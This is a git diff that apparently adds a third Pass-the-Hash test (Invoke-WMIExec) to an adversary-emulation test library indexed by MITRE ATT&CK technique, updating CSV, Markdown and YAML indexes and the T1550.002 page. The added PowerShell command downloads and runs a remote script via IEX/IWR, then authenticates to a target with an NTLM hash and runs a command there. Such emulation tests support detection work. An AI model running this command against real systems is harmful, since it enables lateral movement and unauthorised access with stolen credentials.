diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 9986ec07..abf1af74 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -572,6 +572,7 @@ defense-evasion,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from defense-evasion,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt +defense-evasion,T1550.002,Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt defense-evasion,T1550.003,Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell defense-evasion,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell @@ -1079,6 +1080,7 @@ execution,T1047,Windows Management Instrumentation,10,Application uninstall usin lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt lateral-movement,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt +lateral-movement,T1550.002,Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt lateral-movement,T1550.003,Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell lateral-movement,T1563.002,RDP Hijacking,1,RDP hijacking,a37ac520-b911-458e-8aed-c5f1576d9f46,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 20ac5780..692aced5 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -398,6 +398,7 @@ defense-evasion,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from defense-evasion,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt +defense-evasion,T1550.002,Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt defense-evasion,T1550.003,Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell defense-evasion,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell @@ -797,6 +798,7 @@ exfiltration,T1567,Exfiltration Over Web Service,1,Data Exfiltration with Config lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt lateral-movement,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt +lateral-movement,T1550.002,Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt lateral-movement,T1550.003,Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell lateral-movement,T1563.002,RDP Hijacking,1,RDP hijacking,a37ac520-b911-458e-8aed-c5f1576d9f46,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 5dd8173b..4a99b5f3 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -867,6 +867,7 @@ - [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md) - Atomic Test #1: Mimikatz Pass the Hash [windows] - Atomic Test #2: crackmapexec Pass the Hash [windows] + - Atomic Test #3: Invoke-WMIExec Pass the Hash [windows] - [T1550.003 Pass the Ticket](../../T1550.003/T1550.003.md) - Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows] - Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows] @@ -1757,6 +1758,7 @@ - [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md) - Atomic Test #1: Mimikatz Pass the Hash [windows] - Atomic Test #2: crackmapexec Pass the Hash [windows] + - Atomic Test #3: Invoke-WMIExec Pass the Hash [windows] - [T1550.003 Pass the Ticket](../../T1550.003/T1550.003.md) - Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows] - Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 6f46987d..7cf3428c 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -625,6 +625,7 @@ - [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md) - Atomic Test #1: Mimikatz Pass the Hash [windows] - Atomic Test #2: crackmapexec Pass the Hash [windows] + - Atomic Test #3: Invoke-WMIExec Pass the Hash [windows] - [T1550.003 Pass the Ticket](../../T1550.003/T1550.003.md) - Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows] - Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows] @@ -1314,6 +1315,7 @@ - [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md) - Atomic Test #1: Mimikatz Pass the Hash [windows] - Atomic Test #2: crackmapexec Pass the Hash [windows] + - Atomic Test #3: Invoke-WMIExec Pass the Hash [windows] - [T1550.003 Pass the Ticket](../../T1550.003/T1550.003.md) - Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows] - Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 97667bc1..1688571a 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -35999,6 +35999,36 @@ defense-evasion: executor: command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n" name: command_prompt + - name: Invoke-WMIExec Pass the Hash + auto_generated_guid: f8757545-b00a-4e4e-8cfb-8cfb961ee713 + description: |- + Use Invoke-WMIExec to Pass the Hash + Note: must dump hashes first + [Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth) + supported_platforms: + - windows + input_arguments: + ntlm: + description: ntlm hash + type: string + default: cc36cf7a8514893efccd3324464tkg1a + user_name: + description: username + type: string + default: Administrator + command: + description: Command to run on target system + type: string + default: hostname + target: + description: System to run command on + type: string + default: "$env:COMPUTERNAME" + executor: + command: |- + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command} + name: powershell T1550.003: technique: object_marking_refs: @@ -72169,6 +72199,36 @@ lateral-movement: executor: command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n" name: command_prompt + - name: Invoke-WMIExec Pass the Hash + auto_generated_guid: f8757545-b00a-4e4e-8cfb-8cfb961ee713 + description: |- + Use Invoke-WMIExec to Pass the Hash + Note: must dump hashes first + [Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth) + supported_platforms: + - windows + input_arguments: + ntlm: + description: ntlm hash + type: string + default: cc36cf7a8514893efccd3324464tkg1a + user_name: + description: username + type: string + default: Administrator + command: + description: Command to run on target system + type: string + default: hostname + target: + description: System to run command on + type: string + default: "$env:COMPUTERNAME" + executor: + command: |- + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command} + name: powershell T1550.003: technique: object_marking_refs: diff --git a/atomics/T1550.002/T1550.002.md b/atomics/T1550.002/T1550.002.md index 5265a8f9..1aee20cf 100644 --- a/atomics/T1550.002/T1550.002.md +++ b/atomics/T1550.002/T1550.002.md @@ -12,6 +12,8 @@ Adversaries may also use stolen password hashes to "overpass the hash." Similar - [Atomic Test #2 - crackmapexec Pass the Hash](#atomic-test-2---crackmapexec-pass-the-hash) +- [Atomic Test #3 - Invoke-WMIExec Pass the Hash](#atomic-test-3---invoke-wmiexec-pass-the-hash) +
@@ -116,4 +118,43 @@ Write-Host Automated installer not implemented yet, please install crackmapexec +
+
+ +## Atomic Test #3 - Invoke-WMIExec Pass the Hash +Use Invoke-WMIExec to Pass the Hash +Note: must dump hashes first +[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth) + +**Supported Platforms:** Windows + + +**auto_generated_guid:** f8757545-b00a-4e4e-8cfb-8cfb961ee713 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a| +| user_name | username | string | Administrator| +| command | Command to run on target system | string | hostname| +| target | System to run command on | string | $env:COMPUTERNAME| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 +IEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command} +``` + + + + + +